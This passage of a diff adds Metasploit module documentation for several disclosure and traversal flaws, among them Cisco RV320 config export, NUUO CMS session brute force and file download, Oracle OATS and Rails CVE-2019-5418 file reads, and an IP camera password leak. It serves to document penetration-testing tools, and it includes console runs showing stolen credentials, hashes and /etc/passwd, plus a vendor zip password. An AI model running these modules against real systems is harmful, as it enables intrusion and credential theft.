+    [*] Attempting to load data from /cgi-bin/read.cgi?page=2
+    [+] Found: admin:12345
+    [+] Found: user:56789
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    [*] Starting persistent handler(s)...
+    msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
+    Credentials
+    ===========
+    
+    host       origin     service        public  private  realm  private_type
+    ----       ------     -------        ------  -------  -----  ------------
+    127.0.0.1  127.0.0.1  80/tcp (http)  admin   12345           Password
+    127.0.0.1  127.0.0.1  80/tcp (http)  user    56789           Password
+  ```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router.  The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
+
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+
+More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
+
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. `use auxiliary/gather/cisco_rv320_config`
+ 3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
+ 4. `run`
+ 5. Review the downloaded configuration file cited in the output.  For example:
+>```
+>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_192.168.1.1_cisco.rv.config_791561.txt
+>```
+ 6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
+
+## Options
+
+*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
+
+*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
+
+## Scenarios
+
+#### Against firmware version 1.4.2.15, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.15, on the WAN interface, port 8007:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 203.0.113.54
+RHOSTS => 203.0.113.54
+msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
+RPORT => 8007
+msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
+SSL => false
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_203.0.113.54_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against firmware version 1.4.2.17, on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Against newer firmware (>= 1.4.2.19), on the LAN interface, port 443:
+
+```
+msf5 >
+msf5 > use auxiliary/gather/cisco_rv320_config
+msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 auxiliary(gather/cisco_rv320_config) > run
+
+[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
+[*] Auxiliary module execution completed
+```
+
+#### If module succeeds, check the database:
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > hosts
+
+Hosts
+=====
+
+address      mac                name          os_name  os_flavor  os_sp  purpose  info  comments
+-------      ---                ----          -------  ---------  -----  -------  ----  --------
+203.0.113.54 70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+192.168.1.1  70:E4:22:94:E7:20  router94e720  Cisco    RV320                            
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > creds
+Credentials
+===========
+
+host         origin       service          public  private                            realm  private_type
+----         ------       -------          ------  -------                            -----  ------------
+203.0.113.54 192.168.1.1  8007/tcp (http)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+192.168.1.1  192.168.1.1  443/tcp (https)  cisco   $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/         Nonreplayable hash
+```
+
+```
+msf5 auxiliary(gather/cisco_rv320_config) > loot
+
+Loot
+====
+
+host         service  type             name  content     info  path
+----         -------  ----             ----  -------     ----  ----
+203.0.113.54          cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206213439_default_203.0.113.54_cisco.rv.config_791561.txt
+192.168.1.1           cisco.rv.config        text/plain        /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
+```
@@ -0,0 +1,66 @@
+## Description
+
+This module performs unauthenticated requests to retrieve masthead, sites, and packages information from IBM BigFix Relay Servers. If the **DOWNLOAD** option is set then the module will attempt to download the identified packages. This module has been tested against Relay Server 9.5.10.79.
+
+## Vulnerable Application
+
+BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
+
+## Options
+
+**SHOW_MASTHEAD**
+
+Default: true. Read Organization name from `/masthead/masthead.axfm`
+
+**SHOW_PACKAGES**
+
+Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
+
+**SHOW_SITES**
+
+Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
+
+**DOWNLOAD**
+
+Default true. Attempt to download identified packages.
+
+**ShowURL**
+
+Default false. Show full URL for the packages instead of the filename.
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use auxiliary/gather/ibm_bigfix_sites_packages_enum`
+3. `set rhosts <rhost>`
+4. `exploit`
+
+## Scenarios
+
+### Relay Version 9.5.10.79
+
+```
+msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts <rhost>
+rhosts => <rhost>
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit
+[*] Running module against [IP]
+
+[+] [Organization]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/actionsite
+[+] http://[hostname]:52311/cgi-bin/bfenterprise/PostResults.exe
+<snip>
+[*] Sites
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+<snip>
+[*] Packages
+[*] Action: [action number]
+[+] File: [package name]
+[*] Action: [action number]
+[+] File: [package name]
+<snip>
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) >
+```
@@ -0,0 +1,62 @@
+## Description
+
+  SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
+  and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
+  allow an unauthenticated user to disclose the username & password by
+  requesting the javascript page 'readfile.cgi?query=ADMINID'.
+  Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/readfile.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+my $data = <<'DATA';
+var Adm_ID="admin";
+var Adm_Pass1="password";
+var Language="en";
+var Logoff_Time="0";
+DATA
+if ($Q::query == "ADMINID") {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/ipcamera_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+  msf5 > use auxiliary/gather/ipcamera_password_disclosure 
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1
+  rhosts => 127.0.0.1
+  msf5 auxiliary(gather/ipcamera_password_disclosure) > run
+  
+  [+] Found: admin:password
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,81 @@
+## Description
+
+Nuuo CMS Session Bruteforce
+
+The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
+
+The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
+
+```
+.text:00454E80 000                 push    0FFFFFFFFh
+.text:00454E82 004                 push    offset loc_5E2013
+.text:00454E87 008                 mov     eax, large fs:0
+.text:00454E8D 008                 push    eax
+.text:00454E8E 00C                 sub     esp, 8    
+.text:00454E91 014                 push    ebp
+.text:00454E92 018                 push    esi
+.text:00454E93 01C                 push    edi
+.text:00454E94 020                 mov     eax, dword_68D134
+.text:00454E99 020                 xor     eax, esp   
+.text:00454E9B 020                 push    eax
+.text:00454E9C 024                 lea     eax, [esp+24h+var_C]
+.text:00454EA0 024                 mov     large fs:0, eax
+.text:00454EA6 024                 mov     ebp, ecx
+.text:00454EA8 024                 lea     edi, [ebp+43Ch] 
+.text:00454EAE 024                 push    edi             ; lpCriticalSection_EnterCriticalSection
+.text:00454EAF 028                 mov     [esp+28h+var_10], edi
+.text:00454EB3 028                 call    ds:EnterCriticalSection
+.text:00454EB9 024                 push    1B8h            ; unsigned int
+.text:00454EBE 028                 mov     [esp+28h+var_4], 0
+.text:00454EC6 028                 call    ??2@YAPAXI@Z    ; new() operator, returns object in eax
+(...)
+```
+
+After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
+
+```
+NUCM/1.0 200 OK
+User-Valid: %d
+Server-Version: %s
+Ini-Version: %d
+License-Number: %d
+User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
+```
+
+These session numbers (tokens) are not that easy to predict, however after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed between in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
+
+This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. 
+Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
+
+It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.0 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server v2.1.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
+
+[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
+[*] 172.22.222.200:5180 - Generating 2621440 session tokens
+[+] 172.22.222.200:5180 - Found valid user session: 42094216
+[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_bruteforce) >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,71 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Download
+
+The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below:
+
+```
+GETCONFIG NUCM/1.0
+FileName: <filename>
+FileType: <number>
+User-Session-No: <session-number>
+```
+
+The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail.
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including:
+
+- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password)
+- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password
+- Any other sensitive files in the drive where CMS Server is installed.
+
+This module works in the following way:
+
+- if a SESSION number is present, uses that to login
+- if not, tries to authenticate with USERNAME and PASSWORD
+
+Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+ - 3.1 OK
+ - 3.3 OK
+ - 3.5 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
+
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
+[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
+[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
+[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
+[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
+[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
+[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_file_download) >
+```
+
+## References
+
+- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,79 @@
+## Description
+
+Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
+
+In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.
+
+This vulnerability is also known as CVE-2019-2557.
+
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Windows Server 2008 R2 x64 (other Windows systems are also supported)
+  - .Net Framework 3.5 enabled (from add/remove features)
+  - IE ESC (from Server Manager) disabled
+  - 8GB of RAM (at least more than 4GB will be used to run OATS)
+  - Duel-Core processor
+- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
+- Jdk-7u21-windows-x64.exe
+- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
+- Firefox (I had to install this because IE on Win2k8 is completely outdated)
+- Adobe Flash installed (IE ESC needs to be disabled in order to install this)
+
+For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.
+
+## Notes
+
+By default, your starting traversal path is:
+
+```
+C:\OracleATS\config\Report Templates\
+```
+
+There are some interesting files you can steal from this directory, such as:
+
+* oats-config.xml
+* oats-database-config.xml
+* oats-keystore
+
+Code execution is possible leveraging from this vulnerability if you target these files:
+
+* C:\OracleATS\oats\servers\AdminServer\security\SerializedSystemIni.dat
+* C:\OracleATS\oats\servers\AdminServer\security\boot.properties
+
+After that, you can find a third party script to decrypt the credentials, and then you could
+gain code execution from the administrator console.
+
+
+## Credit
+
+Special thanks to Steven Seeley to assist on the development of the Metasploit module.
+
+## Scenarios
+
+```
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > run
+[*] Running module against 172.16.249.143
+
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
+<properties>
+<entry key="oracle.oats.cluster.agent.username">oats-agent</entry>
+<entry key="oracle.oats.security.keystore.info">eYAdfLaDkdBlUmflYhpg+CHGeXc=</entry>
+<entry key="oracle.oats.cluster.username">oats</entry>
+<entry key="oracle.oats.cluster.agent.password">{AES}WNdIPXpoeoZzyDNuJPm0wU4R3YKc1SUR2k5+TbQfzIQ=</entry>
+<entry key="oracle.oats.admin.username">oats</entry>
+<entry key="oracle.oats.http.url">http://localhost:8088</entry>
+<entry key="oracle.oats.config.version">9.1.0</entry>
+<entry key="oracle.oats.admin.password">{AES}NHrwlbPc7Arlb7puj+UlzAAXB/dUEbv3bdwNnee1/sc=</entry>
+<entry key="oracle.oats.cluster.password">{AES}WMTjMmLChdB9CTSrnyJ33113u0ml0juuGZQCWPODJTk=</entry>
+<entry key="oracle.oats.admin.url">t3://localhost:8088</entry>
+<entry key="oracle.oats.tmp.dir">/tmp</entry>
+<entry key="oracle.oats.cluster.url">t3://localhost:8088</entry>
+</properties>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > 
+```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+  Ruby on Rails versions <= 5.2.2. The following example shows how to recreate the vulnerable environment on Linux:
+
+  https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
+
+## Verification Steps
+
+  1. Start a Rails server using a vulnerable version 
+  2. Start msfconsole
+  3. Do: ```use auxiliary/gather/rails_doubletap_file_read```
+  4. Do: ```set ROUTE /your_route```
+  5. Do: ```set RHOSTS target```
+  6. Do: ```set TARGET_FILE /absolute/path/to/remote/file.txt```
+  7. Do: ```run```
+  8. If everything goes smoothly, you should get the contents of the remote file printed to the console.
+
+
+## Options
+
+  **ROUTE**
+
+  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 
+
+  **TARGET_FILE**
+
+  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
+
+## Advanced Options
+
+  **SKIP_CHECK**
+  
+  This options skips the initial vulnerability check and continues thinking the server is vulnerable. 
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+
+  ```
+msf5 > use auxiliary/gather/rails_doubletap_file_read
+msf5 auxiliary(gather/rails_doubletap_file_read) > options
+
+Module options (auxiliary/gather/rails_doubletap_file_read):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target address range or CIDR identifier
+   ROUTE        /msf             yes       A route on the vulnerable server.
+   RPORT        80               yes       The target port (TCP)
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILE  /etc/passwd      yes       The absolute path of remote file to read.
+   VHOST                         no        HTTP server virtual host
+
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RHOSTS localhost
+RHOSTS => localhost
+msf5 auxiliary(gather/rails_doubletap_file_read) > set RPORT 8000
+RPORT => 8000
+smsf5 auxiliary(gather/rails_doubletap_file_read) > set ROUTE /demo
+ROUTE => /demo
+msf5 auxiliary(gather/rails_doubletap_file_read) > run
+[*] Running module against 127.0.0.1
+
+[+] Target is vulnerable!
+[*] Requesting file /etc/passwd
+[+] Response from server:
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+...snip...
+systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+postgres:x:105:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+
+[*] Auxiliary module execution completed  
+```
@@ -0,0 +1,28 @@
+This module provides a port of Daniel Mende's (released under the BSD license) gtp-scan.py utility. It brings the ability to scan for GPRS servers to Metasploit via sending GTP-U v1 and v2 echo requests.
+
+## Vulnerable Application
+
+Open-source GGSN implementations can be used as a target for this module as well as commercial GPRS gear. For information on one project suitable as a target, see [OsmoGGSN](https://osmocom.org/projects/openggsn/wiki/OsmoGGSN).
+
+## Options
+
+   **The RPORT option**
+
+   This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.
+
+## Scenarios
+
+```
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > set RHOSTS 192.168.28.200-192.168.28.208
+RHOSTS => 192.168.28.200-192.168.28.208
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) > run
+
+[*] [2019.04.22-16:38:27] Sending probes to 192.168.28.200->192.168.28.208 (9 hosts)
+[+] [2019.04.22-16:38:42] GTP v1 echo response received from: 192.168.28.200:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.201:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.207:2152
+[+] [2019.04.22-16:38:43] GTP v1 echo response received from: 192.168.28.208:2152
+[*] [2019.04.22-16:38:43] Scanned 9 of 9 hosts (100% complete)
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:1) auxiliary(scanner/gprs/gtp_echo) >
+```
@@ -0,0 +1,54 @@
+## Description
+
+This module will connect to a provided range of web severs and determine if directory listings are enabled on them.
+
+## Vulnerable Application
+
+This module has been verified against the web server listed below.
+
+### Mock Vulnerable Server
+
+These instructions will create a web sever using `apache` with directory listing vulnerability enabled on it.
+
+#### Setup
+
+1. Create the `.htaccess` file with the vulnerable configuration: `echo 'Options +Indexes' > /var/www/html/.htaccess`
+2. Start the apache server `service apache2 start`.
+
+#### Note 
+
+Make sure you dont have an `index.html` file in your `/var/www/html` for the vulnerability to work.
+
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/dir_listing```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+### Against the Mock server listed above
+
+```
+msf > use auxiliary/scanner/http/dir_listing
+msf auxiliary(scanner/http/dir_listing) > set RHOSTS 1.1.1.10-14
+RHOSTS => 1.1.1.10-14
+msf auxiliary(scanner/http/dir_listing) > set THREADS 4
+THREADS => 4
+msf auxiliary(scanner/http/dir_listing) > set verbose true
+verbose => true
+msf auxiliary(scanner/http/dir_listing) > run
+
+[-] The connection was refused by the remote host (1.1.1.13:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.13:80/
+[-] The connection was refused by the remote host (1.1.1.12:80).
+[*] NOT Vulnerable to directory listing http://1.1.1.12:80/
+[*] NOT Vulnerable to directory listing http://1.1.1.11:80/
+[*] Scanned 3 of 4 hosts (75% complete)
+[+] Found Directory Listing http://1.1.1.14:80/
+[*] Scanned 4 of 4 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/dir_listing) >
+```
@@ -0,0 +1,263 @@
+## Vulnerable Application
+
+  ES File Explorer has an HTTP server that runs and accepts 
+  certain commands. The HTTP server is started on app launch, and is 
+  available as long as the app is open. ES File Explorer launches as
+  a service in the background on device boot. Version 4.1.9.7.4 and below 
+  are reported vulnerable. This module has been tested against 
+  [4.1.9.5.1](https://www.apkmirror.com/apk/es-global/es-file-explorer/es-file-explorer-4-1-9-5-1-release/).
+
+  This module includes all functionality from the original [POC](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
+  except for the `getAppThumbnail` command.
+
+  Available actions:
+
+ *  **APPLAUNCH**       Launch an app. ACTIONITEM required.
+ *  **GETDEVICEINFO**   Get device info
+ *  **GETFILE**         Get a file from the device. ACTIONITEM required.
+ *  **LISTAPPS**        List all the apps installed
+ *  **LISTAPPSALL**     List all the apps installed
+ *  **LISTAPPSPHONE**   List all the phone apps installed
+ *  **LISTAPPSSDCARD**  List all the apk files stored on the sdcard
+ *  **LISTAPPSSYSTEM**  List all the system apps installed
+ *  **LISTAUDIOS**      List all the audio files
+ *  **LISTFILES**       List all the files on the sdcard
+ *  **LISTPICS**        List all the pictures
+ *  **LISTVIDEOS**      List all the videos
+
+  Not all of the information from the commands is printed to screen, however the origin JSON
+  content is stored in loot for reference.
+
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use modules/auxiliary/scanner/http/es_file_explorer_open_port```
+  4. Do: ```run```
+  5. You should get device information
+
+## Options
+
+  **ACTION**
+
+  The action to perform.  See description in Vulnerable Application section for additional details.  Default is `GETDEVICEINFO`.
+
+  **ACTIONITEM**
+
+  If running `APPLAUNCH` or `GETFILE`, this is the app to launch or file to download.
+
+## Scenarios
+
+### ES File Explorer 4.1.9.5.1 on a Dragon Touch Y88X on Android 4.4
+
+```
+resource (es.rb)> use modules/auxiliary/scanner/http/es_file_explorer_open_port
+resource (es.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (es.rb)> set action GETDEVICEINFO
+action => GETDEVICEINFO
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - Name: Y88X
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTFILES
+action => LISTFILES
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  folder: bootloader (0.00 Bytes) - 3/23/2019 10:36:51 AM
+  folder: databk (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: sdcard (4.00 KB) - 3/23/2019 02:15:24 PM
+  folder: storage (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: config (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: cache (4.00 KB) - 3/24/2019 07:37:46 AM
+  folder: acct (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  folder: vendor (4.00 KB) - 1/31/2015 05:56:49 AM
+  folder: d (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: etc (4.00 KB) - 2/3/2015 03:51:06 AM
+  folder: mnt (0.00 Bytes) - 3/23/2019 10:36:49 AM
+  file: ueventd.sun8i.rc (1.18 KB) - 12/31/1969 07:00:00 PM
+  file: ueventd.rc (3.93 KB) - 12/31/1969 07:00:00 PM
+  folder: system (4.00 KB) - 12/31/1969 07:00:00 PM
+  folder: sys (0.00 Bytes) - 3/23/2019 10:36:45 AM
+  file: sepolicy (73.82 KB) - 12/31/1969 07:00:00 PM
+  file: seapp_contexts (656.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: sbin (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: res (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: property_contexts (2.11 KB) - 12/31/1969 07:00:00 PM
+  folder: proc (0.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: nand.ko (1.47 MB) - 12/31/1969 07:00:00 PM
+  file: initlogo.rle (2.34 MB) - 12/31/1969 07:00:00 PM
+  file: init.usb.rc (3.82 KB) - 12/31/1969 07:00:00 PM
+  file: init.trace.rc (1.75 KB) - 12/31/1969 07:00:00 PM
+  file: init.sunxi.wifi.bt.rc (1010.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.usb.rc (3.40 KB) - 12/31/1969 07:00:00 PM
+  file: init.sun8i.rc (4.67 KB) - 12/31/1969 07:00:00 PM
